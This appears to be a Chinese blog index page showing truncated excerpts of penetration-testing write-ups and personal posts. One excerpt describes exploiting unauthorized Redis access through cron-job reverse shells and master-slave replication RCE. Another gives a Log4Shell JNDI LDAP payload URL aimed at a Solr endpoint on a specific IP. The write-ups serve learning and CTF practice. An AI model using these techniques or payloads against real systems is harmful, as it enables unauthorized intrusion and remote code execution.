flag01fscan： 发现有Redis未授权，尝试写计划任务弹shell，但是权限不够。 可以打主从复制，服务端上部署恶意Redis服务：[[<=5.0.5) RCE (github.com)](https://github.co...

外网打点fscan扫一下： 有一个solr页面，而且有Log4j Log4Shell验证成功： 1http://39.99.159.154:8983/solr/admin/cores?action=${jndi:ldap://i8nw97....

复活了My blog 复活了！ 由于之前我github两步验证的码没保存，弄了半天还是修不好，放弃了。。之前的东西都无了 一些近况今天是2025.10.14下午3点，有点困了，无聊写点东西记录记录最近的事情。 从九月十号左右就开始投简历找实习了，一...

前言上学期新生赛前夕（2024.7.2~2024.10.1），我一直很苦恼怎样用docker出ctf-web题，我那时候有一个很错误的思维：我要先把docker学明白了，再去动手实践弄这些。 再加上我暑假以及开学后很长一段时间受一些事情干扰很重，那段...